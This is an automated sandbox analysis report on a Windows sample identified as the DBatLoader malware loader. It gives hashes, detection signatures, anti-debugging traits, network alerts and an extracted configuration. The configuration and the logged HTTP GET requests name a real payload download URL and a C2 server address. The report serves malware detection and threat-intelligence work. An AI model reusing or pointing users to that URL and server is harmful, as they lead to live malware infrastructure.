Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UAHIzSm2x2.exe

Overview

General Information

Sample name:UAHIzSm2x2.exe
renamed because original name is a hash value
Original sample name:483ab6bd562b28782d0999abec4f57f5.exe
Analysis ID:1590517
MD5:483ab6bd562b28782d0999abec4f57f5
SHA1:b758556af2b98708b97a6c3bdbd1e9f2905ed690
SHA256:e5393c34240b7e1b8a35052d7e151c324a4aa6424b5a6e1a45717157042fb9ab
Tags:exeuser-abuse_ch
Infos:

Detection

DBatLoader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • UAHIzSm2x2.exe (PID: 6228 cmdline: "C:\Users\user\Desktop\UAHIzSm2x2.exe" MD5: 483AB6BD562B28782D0999ABEC4F57F5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["http://amazonenviro.com/245_Aiymwhpjxsg"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.3461173693.000000007FBB0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    00000000.00000002.3446485255.00000000022F6000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.UAHIzSm2x2.exe.22f65a8.1.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
        0.2.UAHIzSm2x2.exe.2890000.2.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
          0.2.UAHIzSm2x2.exe.22f65a8.1.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-14T08:24:10.558255+010020283713Unknown Traffic192.168.2.649718166.62.27.188443TCP
            2025-01-14T08:24:12.405250+010020283713Unknown Traffic192.168.2.649736166.62.27.188443TCP
            2025-01-14T08:24:14.338304+010020283713Unknown Traffic192.168.2.649748166.62.27.188443TCP
            2025-01-14T08:24:16.296521+010020283713Unknown Traffic192.168.2.649761166.62.27.188443TCP
            2025-01-14T08:24:18.281135+010020283713Unknown Traffic192.168.2.649777166.62.27.188443TCP
            2025-01-14T08:24:20.231335+010020283713Unknown Traffic192.168.2.649794166.62.27.188443TCP
            2025-01-14T08:24:22.182065+010020283713Unknown Traffic192.168.2.649806166.62.27.188443TCP
            2025-01-14T08:24:24.136166+010020283713Unknown Traffic192.168.2.649824166.62.27.188443TCP
            2025-01-14T08:24:26.166228+010020283713Unknown Traffic192.168.2.649841166.62.27.188443TCP
            2025-01-14T08:24:28.131820+010020283713Unknown Traffic192.168.2.649856166.62.27.188443TCP
            2025-01-14T08:24:30.078952+010020283713Unknown Traffic192.168.2.649871166.62.27.188443TCP
            2025-01-14T08:24:32.007116+010020283713Unknown Traffic192.168.2.649881166.62.27.188443TCP
            2025-01-14T08:24:34.045606+010020283713Unknown Traffic192.168.2.649896166.62.27.188443TCP
            2025-01-14T08:24:35.982748+010020283713Unknown Traffic192.168.2.649909166.62.27.188443TCP
            2025-01-14T08:24:37.942258+010020283713Unknown Traffic192.168.2.649926166.62.27.188443TCP
            2025-01-14T08:24:39.916563+010020283713Unknown Traffic192.168.2.649941166.62.27.188443TCP
            2025-01-14T08:24:41.844140+010020283713Unknown Traffic192.168.2.649953166.62.27.188443TCP
            2025-01-14T08:24:43.798640+010020283713Unknown Traffic192.168.2.649966166.62.27.188443TCP
            2025-01-14T08:24:46.605744+010020283713Unknown Traffic192.168.2.649982166.62.27.188443TCP
            2025-01-14T08:24:48.526451+010020283713Unknown Traffic192.168.2.649998166.62.27.188443TCP
            2025-01-14T08:24:50.493883+010020283713Unknown Traffic192.168.2.650010166.62.27.188443TCP
            2025-01-14T08:24:52.428494+010020283713Unknown Traffic192.168.2.650027166.62.27.188443TCP
            2025-01-14T08:24:54.368392+010020283713Unknown Traffic192.168.2.650029166.62.27.188443TCP
            2025-01-14T08:24:56.342749+010020283713Unknown Traffic192.168.2.650031166.62.27.188443TCP
            2025-01-14T08:24:58.286247+010020283713Unknown Traffic192.168.2.650033166.62.27.188443TCP
            2025-01-14T08:25:00.225958+010020283713Unknown Traffic192.168.2.650035166.62.27.188443TCP
            2025-01-14T08:25:02.169327+010020283713Unknown Traffic192.168.2.650038166.62.27.188443TCP
            2025-01-14T08:25:04.209196+010020283713Unknown Traffic192.168.2.650040166.62.27.188443TCP
            2025-01-14T08:25:06.190632+010020283713Unknown Traffic192.168.2.650042166.62.27.188443TCP
            2025-01-14T08:25:08.118909+010020283713Unknown Traffic192.168.2.650044166.62.27.188443TCP
            2025-01-14T08:25:10.033109+010020283713Unknown Traffic192.168.2.650046166.62.27.188443TCP
            2025-01-14T08:25:11.978018+010020283713Unknown Traffic192.168.2.650048166.62.27.188443TCP
            2025-01-14T08:25:13.976443+010020283713Unknown Traffic192.168.2.650050166.62.27.188443TCP
            2025-01-14T08:25:15.909470+010020283713Unknown Traffic192.168.2.650052166.62.27.188443TCP
            2025-01-14T08:25:17.885246+010020283713Unknown Traffic192.168.2.650055166.62.27.188443TCP
            2025-01-14T08:25:19.825410+010020283713Unknown Traffic192.168.2.650057166.62.27.188443TCP
            2025-01-14T08:25:21.755181+010020283713Unknown Traffic192.168.2.650059166.62.27.188443TCP
            2025-01-14T08:25:23.714602+010020283713Unknown Traffic192.168.2.650061166.62.27.188443TCP
            2025-01-14T08:25:25.647828+010020283713Unknown Traffic192.168.2.650063166.62.27.188443TCP
            2025-01-14T08:25:27.568751+010020283713Unknown Traffic192.168.2.650065166.62.27.188443TCP
            2025-01-14T08:25:29.504572+010020283713Unknown Traffic192.168.2.650067166.62.27.188443TCP
            2025-01-14T08:25:31.480033+010020283713Unknown Traffic192.168.2.650069166.62.27.188443TCP
            2025-01-14T08:25:33.452995+010020283713Unknown Traffic192.168.2.650071166.62.27.188443TCP
            2025-01-14T08:25:35.378327+010020283713Unknown Traffic192.168.2.650073166.62.27.188443TCP
            2025-01-14T08:25:37.276138+010020283713Unknown Traffic192.168.2.650075166.62.27.188443TCP
            2025-01-14T08:25:39.232950+010020283713Unknown Traffic192.168.2.650077166.62.27.188443TCP
            2025-01-14T08:25:41.165641+010020283713Unknown Traffic192.168.2.650079166.62.27.188443TCP
            2025-01-14T08:25:43.065507+010020283713Unknown Traffic192.168.2.650081166.62.27.188443TCP
            2025-01-14T08:25:44.969186+010020283713Unknown Traffic192.168.2.650083166.62.27.188443TCP
            2025-01-14T08:25:46.871981+010020283713Unknown Traffic192.168.2.650085166.62.27.188443TCP
            2025-01-14T08:25:48.773009+010020283713Unknown Traffic192.168.2.650087166.62.27.188443TCP
            2025-01-14T08:25:50.688170+010020283713Unknown Traffic192.168.2.650090166.62.27.188443TCP
            2025-01-14T08:25:52.611704+010020283713Unknown Traffic192.168.2.650092166.62.27.188443TCP
            2025-01-14T08:25:54.516715+010020283713Unknown Traffic192.168.2.650094166.62.27.188443TCP
            2025-01-14T08:25:56.420846+010020283713Unknown Traffic192.168.2.650096166.62.27.188443TCP
            2025-01-14T08:25:58.402905+010020283713Unknown Traffic192.168.2.650098166.62.27.188443TCP
            2025-01-14T08:26:00.326241+010020283713Unknown Traffic192.168.2.650100166.62.27.188443TCP
            2025-01-14T08:26:02.259162+010020283713Unknown Traffic192.168.2.650102166.62.27.188443TCP
            2025-01-14T08:26:04.207809+010020283713Unknown Traffic192.168.2.650104166.62.27.188443TCP
            2025-01-14T08:26:06.144655+010020283713Unknown Traffic192.168.2.650106166.62.27.188443TCP
            2025-01-14T08:26:08.062325+010020283713Unknown Traffic192.168.2.650108166.62.27.188443TCP
            2025-01-14T08:26:09.994141+010020283713Unknown Traffic192.168.2.650110166.62.27.188443TCP
            2025-01-14T08:26:11.902567+010020283713Unknown Traffic192.168.2.650112166.62.27.188443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://amazonenviro.com:443/245_AiymwhpjxsgAvira URL Cloud: Label: malware
            Source: http://amazonenviro.com/245_AiymwhpjxsgAvira URL Cloud: Label: malware
            Source: https://amazonenviro.com/245_AiymwhpjxsgAvira URL Cloud: Label: malware
            Source: http://amazonenviro.com:80/245_AiymwhpjxsgAvira URL Cloud: Label: malware
            Found malware configuration
            Source: UAHIzSm2x2.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["http://amazonenviro.com/245_Aiymwhpjxsg"]}
            Multi AV Scanner detection for submitted file
            Source: UAHIzSm2x2.exeVirustotal: Detection: 77%Perma Link
            Source: UAHIzSm2x2.exeReversingLabs: Detection: 87%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Source: UAHIzSm2x2.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49761 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49777 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49794 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49806 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49824 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49841 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49856 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49871 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49881 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49896 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49909 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49926 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49941 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49953 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49966 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49982 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:49998 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50010 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50027 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50029 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50031 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50033 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50035 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50038 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50040 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50042 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50044 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50046 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50048 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50050 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50052 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50055 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50057 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50059 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50061 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50063 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50065 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50067 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50069 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50071 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50073 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50075 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50077 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50079 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50081 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50083 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50085 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50087 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50090 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50092 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50094 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50096 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50098 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50100 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50102 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50104 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50106 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50108 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50110 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.6:50112 version: TLS 1.2
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028958B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028958B4

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: http://amazonenviro.com/245_Aiymwhpjxsg
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028AE72C InternetCheckConnectionA,0_2_028AE72C
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49736 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49761 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49777 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49794 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49841 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49824 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49806 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49856 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49871 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49881 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49748 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49909 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49896 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49941 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49966 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50035 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50027 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50044 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50040 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50046 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50042 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50057 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50055 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50050 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49998 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50065 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50010 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49982 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50059 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50077 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50052 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50067 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50069 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50029 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50081 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50079 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50085 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50090 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50100 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50092 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50106 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50094 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50096 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50073 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50112 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50108 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50102 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50033 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50038 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50071 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50063 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50104 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50061 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50048 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50075 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50098 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50087 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50083 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50110 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49926 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49953 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50031 -> 166.62.27.188:443
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
